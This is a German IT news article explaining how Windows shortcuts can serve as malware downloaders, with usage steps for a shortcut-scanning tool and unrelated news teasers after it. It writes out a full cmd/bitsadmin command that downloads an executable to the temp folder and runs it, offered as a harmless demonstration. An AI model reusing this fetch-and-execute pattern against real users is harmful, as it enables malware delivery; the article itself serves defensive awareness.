Eine Verknüpfung unter Windows kann problemlos einen Virus aus dem Internet laden und starten. So verhindern Sie das. [...]
Das Tool Shurtcut Scanner zeigt Ihnen alle in Windows hinterlegten Verknüpfungen (Shortcuts) an. Das ist zum Beispiel dann sinnvoll, wenn Sie Ihren Rechner auf gefährliche Shortcuts überprüfen wollen. Darauf weist der Hersteller des Tools hin. Was zunächst etwas merkwürdig klingt („gefährliche Shortcuts“), ist aber ein durchaus berechtigter Hinweis. Denn der Angriff mit Schadcode auf einen PC läuft sehr oft in zwei Schritten ab.
Zunächst versuchen die Virenverbreiter, einen sogenannten Downloader auf den PC zu platzieren. Das ist ein kleines Programm, das nichts anders macht, als den eigentlichen Virus auf den PC herunterzuladen und zu starten. Der Grund für die Zweiteilung in Download-Code und Virus liegt bei den üblichen Schutzmechanismen. So setzen etwa alle großen Maildienst-Anbieter Virenscanner ein, die den Anhang jeder Mail scannen. Finden Sie dort einen Virus, wird dieser gelöscht. Ein Download-Code dagegen sieht für einen Virenscanner oft harmlos aus. Der Code richtet ja scheinbar nicht viel an. Entsprechend leichter ist es für den Angreifer einen Downloader per Mail zu verteilen.
Verknüpfungen: Auch hinter einer Verknüpfung kann sich ein Download-Code verstecken. Der Code kann sogar komplett aus Bordmitteln von Windows bestehen. So muss ein Angreifer nicht einmal mehr eine EXE- oder DLL-Datei auf den PC schleusen, sondern nur noch den Code, der eine Verknüpfung unter Windows erstellen kann.
Der Hersteller des Tools Shurtcut Scanner, Phrozen Software, gibt ein eindrückliches Beispiel für einen solchen Code, den Sie auch selber ausprobieren können. Klicken Sie mit der rechten Maustaste auf Ihren Desktop und wählen Sie „Neu -> Verknüpfung“. In das folgende Feld geben Sie diesen Befehl ein: Befehl cmd.exe /C „%windir%System32bitsadmin.exe /transfer downloader /priority normalhttps://phrozensoft.com/uploads/2016/09/ Winja_2_6084_65441_setup.exe%temp%setup.exe & %temp%setup.exe“
Ein Klick auf „Weiter“ und „Fertigstellen“ legt die neue Verknüpfung auf den Desktop ab. Nun Bedarf es noch eines kleinen Tricks, den Anwender zum Klick auf die Verknüpfung zu überreden und schon landet Code aus dem Internet auf Ihrem PC und wird gestartet. In diesem Beispiel ist es aber nur das Tool Winja vom Herteller Phrozen Software. Es lädt auf Wunsch Dateien zu einem Online-Virenscanner hoch.
Shortcut Scanner nutzen: Starten Sie das Tool Shortcut Scanner in der für Sie passenden Version, also als 32- oder 64-Bit-Version. Es läuft ohne Installation. Klicken Sie auf das Ordnersymbol und wählen Sie „Full Scan“, um alle Festplatten nach Verknüpfungen durchsuchen zu lassen.
Nach dem Suchlauf listet das Tool alle verdächtigen Verknüpfungen auf und sortiert sie nach ihrer möglichen Gefährlichkeit („Dangerous“, „Suspicous“ und „Broken“). Eine eindeutige Aussage über eine Verknüpfung macht das Tool nicht, sodass Sie sich den Fund noch einmal selber genau prüfen müssen. Möchten Sie eine Verknüpfung beseitigen, dann setzen Sie einen Haken davor und klicken oben auf das Radiergummisymbol. Dort wählen Sie dann die Gefährlichkeitsstufe aus, die Sie bereinigen wollen.
*Arne Arnold arbeitet seit über 15 Jahren bei der PC-WELT als Redakteur in den Bereichen Software und Internet
Die Integration von künstlicher Intelligenz am Edge schafft einen Paradigmenwechsel in der Datenverarbeitung. Moderne IT-Plattformen mit ihren kompakten KI-Servern ermöglichen es, wichtige Informationen direkt an der Quelle zu analysieren. […]
Dank Phishing-as-a-Service können Phishing-Attacken mittlerweile auch von Angreifern ohne Hacking- und Social-Engineering-Kenntnisse problemlos durchgeführt werden, was 2024 zu einer Vervierfachung der Ransomware-Bedrohungen geführt hat. […]
Der Einsatz künstlicher Intelligenz schreitet rasant voran und verändert die Art, wie Software konzipiert und programmiert wird. Aber macht KI bald Softwareentwickler überflüssig? Wie verändert sich der Beruf? Die Antwort ist klar: Die Rolle des Entwicklers verschwindet nicht, sie wandelt sich. […]
AfB social & green IT wird für die Wiener Städtische Versicherung und DONAU Versicherung 9.000 IT-Geräte (Notebooks & Monitore) wiederaufbereiten. Das Refurbishing-Projekt wird voraussichtlich 780.900 kg CO2 einsparen und sorgt für sechs inklusive Arbeitsplätze für Menschen mit einer Behinderung. […]
Ein neuer Bericht von Horizon3.ai legt offen, dass klassische Verteidigungsstrategien zunehmend versagen. Die Analyse von über 50.000 Penetrationstests zeigt, dass Sicherheitslücken systematisch unterschätzt werden. IT Welt.at hat sich die Studie angesehen. […]
Die jährliche Worldwide Developers Conference (WWDC) wird dieses Jahr vom 9. bis 13. Juni online veranstaltet. Für Entwickler und Studierende ist das event kostenlos und es wird am 9. Juni die Möglichkeit geben, persönlich bei einer speziellen Veranstaltung im Apple Park mit dabei zu sein. […]
Künstliche Intelligenz benötigt enorme Leistungsressourcen. Deshalb gibt es spezielle Hoster, die diesen Performancehunger abdecken. Lesen Sie hier, was es dabei zu beachten gibt. […]
In den ersten zwei Monaten des Jahres 2025 erkannten und blockierten die Erkennungssysteme von Barracuda Networks mehr als eine Million Phishing-Angriffe von bekannten Phishing-as-a-Service-Plattformen. Viele davon zielen auf beliebte Cloud-Plattformen wie Microsoft 365 ab. […]
Die intelligente Fabrik ist längst Realität – und auch der „unwissende“ Roboter von einst gehört mehr und mehr der Vergangenheit an. Eine solche Fabrik zeichnet sich durch die Kombination verschiedener Technologien aus, die nahtlos ineinandergreifen. NTT DATA erklärt, welche Rolle KI und Edge Computing dabei spielen. […]
Aktuelle Business IT-News für Österreich. Die ITWELT (vormals: COMPUTERWELT) ist Österreichs führende IT- Zeitung für den gesamten Bereich der Informationstechnik und Telekommunikation. Wir schreiben für leitende IT- Experten (IT-Leiter, CIO) in IT-Branche und EDV-Abteilungen. Unsere Themen: Business Software, Netzwerk, Security, Mobile Kommunikation, Infrastruktur, Cloud, Wirtschaft, IT-Innovation. Zudem finden Sie hier IT-Anbieter, Whitepaper, Webinare, Termine, Social Events und Praxisreports aus der IT und ITK Branche. (c) 2024 - ITW Verlag GmbH
Artikel Empfehlung
Anmeldung Roundtable
Keine Felder gefunden.
Datenschutz Newsletter
Ich erhalte den Newsletter der Computerwelt c/o CW Fachverlag GmbH, Halbgasse 3-5 in 1070 Wien.
Meine Daten werden sicher gespeichert und niemals an Dritte weitergegeben.
Eine Abmeldung vom Newsletter, sowie Anmeldungen zu weiteren Services ist durch einen Link am Ende des Newsletters möglich.
Sie sehen gerade einen Platzhalterinhalt von Facebook. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von Instagram. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von X. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Be the first to comment